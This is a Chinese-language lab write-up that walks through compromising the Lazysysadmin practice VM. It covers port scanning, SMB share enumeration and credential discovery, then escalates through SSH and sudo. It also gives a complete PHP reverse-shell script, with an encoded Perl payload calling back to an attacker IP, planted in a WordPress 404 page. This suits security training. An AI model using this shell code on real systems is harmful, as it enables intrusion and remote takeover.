Lazysysadmin渗透实战

Lazysysadmin渗透还是基于wordpress拿站，正好可以趁这几天专攻wordpress站点进行一次总结，之前看到wordpress总是望而却步，要知道wordpress还是有很多漏洞的。

信息收集

nmap全端口扫

nmap -sS -Pn -A -p- -n 192.168.8.130

1

别的不管，6667这个端口一定不能放过，想到之前在Metasploitable2渗透实战中，在6667端口运行着 UnreaIRCD IRC，直接上msf打掉，这次虽然没成功，但要保持警惕。

2

smb枚举探测

看到139和445端口，这都是高危的共享端口，自己也在用linux的共享服务，先用enum4linux -S 枚举出靶机的共享目录

enum4linux -S 192.168.8.130

3

直接探测出以下共享文件：

//192.168.8.130/print$  Mapping: DENIED, Listing: N/A
//192.168.8.130/share$  Mapping: OK, Listing: OK
//192.168.8.130/IPC$    [E] Can't understand response:

dir爆目录

4

爆出了以下的可疑目录：

http://192.168.8.130/phpmyadmin/
http://192.168.8.130/wordpress/
http://192.168.8.130/Backnode_files/
http://192.168.8.130/robots.txt

在wordpress首页中，发现“My name is togie. ”，登录的用户名可能有 togie

5

在 http://192.168.8.130/Backnode_files/中发现以下这个图片，名字让人一看就觉得有问题

6

爆一下wordpress用户名

http://192.168.8.130/wordpress/?author=1

7

直接Admin，拿去尝试登录，不想爆破。。。

---

smbclient访问共享目录

在kali中smbclient直接访问靶机的共享文件

smbclient //192.168.8.130/share$

8

在win中，直接输入

\\192.168.8.130\share$

9

wordpress拿站可以直接奔着 wp-config.php 去，登录账号、密码 ：Admin / TogieMYSQL12345^^

10

在 share$目录中发现两个重要的txt文件：todolist.txt 和 deets.txt

在deets.txt中：

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

在todolist.txt中：

Prevent users from being able to view to web root using the local file browser

ssh登录提权

想必登录服务器的密码是 12345，用户可能是togie

ssh togie@192.168.8.130

11 12

看到了能直接sudo su,提权

13

到根目录下，get flag吧

14

方法二：

找到wp-config.php 中，账号、密码 分别为：Admin / TogieMYSQL12345^^

登录wordpress站点，在Appearance的Editor中编辑404页面，可以挂上小马，连菜刀；也可以直接反弹shell到kali：192.168.8.253

php反弹shell脚本：

<?php 
function which($pr) { 
$path = execute("which $pr"); 
return ($path ? $path : $pr); 
} 
function execute($cfe) { 
$res = ''; 
if ($cfe) { 
if(function_exists('exec')) { 
@exec($cfe,$res); 
$res = join("\n",$res); 
} elseif(function_exists('shell_exec')) { 
$res = @shell_exec($cfe); 
} elseif(function_exists('system')) { 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(function_exists('passthru')) { 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(@is_resource($f = @popen($cfe,"r"))) { 
$res = ''; 
while(!@feof($f)) { 
$res .= @fread($f,1024); 
} 
@pclose($f); 
} 
} 
return $res; 
} 
function cf($fname,$text){ 
if($fp=@fopen($fname,'w')) { 
@fputs($fp,@base64_decode($text)); 
@fclose($fp); 
} 
} 
$yourip = "192.168.8.253"; 
$yourport = '4444'; 
$usedb = array('perl'=>'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?> 

kali监听：

nc -lvp 4444

触发反弹：http://192.168.8.130/wordpress/wp-content/themes//twentyfifteen/404.php

利用python语句切换到/bin/bash

python -c 'import pty;pty.spawn("/bin/bash")'

15

没办法，这里还是只能利用deets.txt文件中的密码（12345），账号用wordpress首页提示的用户名 togie,进行sudo提权

su togie
id
sudo su

16

总结

最近做了很多的wordpress类站点的渗透攻击，一般来说wordpress是一个相对封闭和安全的博客系统，但细心一点还是能发现一些入口的。在wordpress拿站中：
1、信息收集，?author=1爆用户名，爆破登录……
2、dir爆目录，发现敏感信息
3、phpmyadmin弱口令等
4、文件包含getshell，读文件（etc/passwd）等
5、进入后台，Appearance页面404.php挂马，菜刀连接，反弹shell，提权等

Lazysysadmin靶机百度云下载
链接：https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ
提取码：q6zo